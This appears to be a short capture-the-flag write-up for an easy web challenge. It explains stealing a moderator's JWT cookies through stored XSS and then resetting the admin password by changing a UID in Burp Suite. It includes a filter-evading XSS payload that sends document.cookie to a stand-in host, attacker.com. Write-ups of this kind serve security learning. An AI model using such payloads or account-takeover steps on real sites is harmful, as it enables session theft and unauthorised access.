October 1, 2026
Kryptos Support Web Challenge Write-Up
Hello and welcome everyone to this write-up for the web challenge named “Kryptos Support” which is rated as easy.

By Joseph "n3m0” KANKO
2 min read
I — CHALLENGE DESCRIPTION
Let's start our write-up with a description of the challenge.
The secret vault used by the Longhir's planet council, Kryptos, contains some very sensitive state secrets that Virgil and Ramona are after to prove the injustice performed by the commission. Ulysses performed an initial recon at their request and found a support portal for the vault. Can you take a look if you can infiltrate this system?
II- RECON
Let's begin our second phase reconnaissance by launching the instance and visiting the site.
We can thus see that the site asks the user for an input and sends it to the admin for review.
- EXPLOIT XSS VULNERABILITY
Consequently, we used a payload that enables cookie exfiltration via XSS.
Like this one
<script<script>>fetch("https://attacker.com/log?cookie=" + document.cookie)<</script>/script><script<script>>fetch("https://attacker.com/log?cookie=" + document.cookie)<</script>/script>
Consequently, we can see at the webhook level that we have access to the JWT cookies of a user named "moderator."
We will therefore use these cookies to log in to the interface and access the **/tickets** path.
- LOGIN AS MODERATOR
Now that we have cookies, we can access the tickets(/tickets) path.
- CHANGE ADMIN PASSWORD
On our "tickets" page, we can see a "settings" page designed to allow a user to change their password.
We can therefore use this to change the admin user's password by modifying the UID from 100 to 1 within our Burp Suite setup.
Now, at the Burp level, let's change the UID to 1.
- ADMIN PAGE ACCESS
With this administrator access, we can reach the admin page and also retrieve the flag located there.
I think that's all for this write-up. Thanks for reading don't forget to like and subscribe if you enjoyed it.
Thanks.